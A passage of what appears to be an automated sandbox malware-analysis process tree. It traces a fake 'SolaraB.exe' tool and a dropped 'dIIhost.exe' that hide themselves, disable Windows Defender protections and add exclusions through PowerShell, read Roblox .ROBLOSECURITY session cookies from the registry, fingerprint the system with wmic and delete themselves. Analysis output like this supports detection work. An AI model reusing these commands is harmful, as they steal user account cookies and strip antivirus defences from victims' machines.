        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        19⤵
        Modifies registry class
        
        PID:2072
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        20⤵
        Checks computer location settings
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        21⤵
        
        PID:3428
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        22⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        18⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3840
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:4728
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        19⤵
        Views/modifies file attributes
        
        PID:180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1248
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:2796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        19⤵
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:3688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:4448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        19⤵
        
        PID:3044
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        19⤵
        
        PID:4176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:1376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        19⤵
        
        PID:4092
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        19⤵
        Detects videocard installed
        
        PID:4744
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        19⤵
        
        PID:2156
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        20⤵
        Runs ping.exe
        
        PID:332
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        18⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2764
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        19⤵
        Checks computer location settings
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        20⤵
        
        PID:4084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:3444
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        21⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        17⤵
        Executes dropped EXE
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        17⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3856
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        18⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        19⤵
        
        PID:3884
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        20⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        16⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4636
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:4012
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        17⤵
        Views/modifies file attributes
        
        PID:5092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        17⤵
        
        PID:672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:3248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:3260
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        17⤵
        
        PID:4352
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        17⤵
        
        PID:3392
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        17⤵
        
        PID:5088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        17⤵
        Detects videocard installed
        
        PID:1788
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        17⤵
        
        PID:4800
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        18⤵
        Runs ping.exe
        
        PID:996
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        16⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4200
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        17⤵
        Checks computer location settings
        
        PID:4268
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        18⤵
        
        PID:3192
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        19⤵
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        15⤵
        Executes dropped EXE
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        15⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2464
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        16⤵
        Checks computer location settings
        
        PID:4964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        17⤵
        
        PID:4444
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        18⤵
        Executes dropped EXE
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4912
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:4632
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        15⤵
        Views/modifies file attributes
        
        PID:5052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        
        PID:3444
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:1532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:816
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:4196
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:3168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        
        PID:2316
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:2228
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        15⤵
        
        PID:4644
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        Runs ping.exe
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        14⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3636
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        15⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        16⤵
        
        PID:3588
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        17⤵
        Executes dropped EXE
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        13⤵
        Executes dropped EXE
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        13⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1596
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        14⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        15⤵
        
        PID:4068
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        16⤵
        Executes dropped EXE
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        12⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1540
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:4468
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        13⤵
        Views/modifies file attributes
        
        PID:2308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1552
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        13⤵
        
        PID:4068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        13⤵
        
        PID:220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:3228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1720
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        13⤵
        Detects videocard installed
        
        PID:4868
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:568
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        13⤵
        
        PID:1872
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        14⤵
        Runs ping.exe
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        12⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4876
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        13⤵
        Checks computer location settings
        
        PID:3168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        14⤵
        
        PID:1468
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        15⤵
        Executes dropped EXE
        
        PID:4084
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        11⤵
        Executes dropped EXE
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:4632
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        12⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        13⤵
        
        PID:4408
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        14⤵
        Executes dropped EXE
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        10⤵
        Executes dropped EXE
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:3336
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        11⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        12⤵
        
        PID:3220
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        13⤵
        Executes dropped EXE
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        9⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2196
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:3228
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        10⤵
        Views/modifies file attributes
        
        PID:3552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        10⤵
        
        PID:5112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        10⤵
        
        PID:4376
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        10⤵
        Detects videocard installed
        
        PID:4728
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        10⤵
        
        PID:2244
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        11⤵
        Runs ping.exe
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        9⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4576
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        10⤵
        Checks computer location settings
        
        PID:444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        11⤵
        
        PID:4268
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        12⤵
        Executes dropped EXE
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        8⤵
        Executes dropped EXE
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        8⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4824
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        9⤵
        
        PID:3644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        10⤵
        
        PID:816
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        11⤵
        Executes dropped EXE
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        7⤵
        Executes dropped EXE
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:1388
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        8⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        9⤵
        
        PID:936
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        10⤵
        Executes dropped EXE
        
        PID:4944
      - C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2256
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1724
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:4380
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:5052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:3648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2604
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:1616
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4948
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        7⤵
        
        PID:5084
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        Runs ping.exe
        
        PID:2120
      - C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5060
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        7⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        8⤵
        
        PID:2312
        
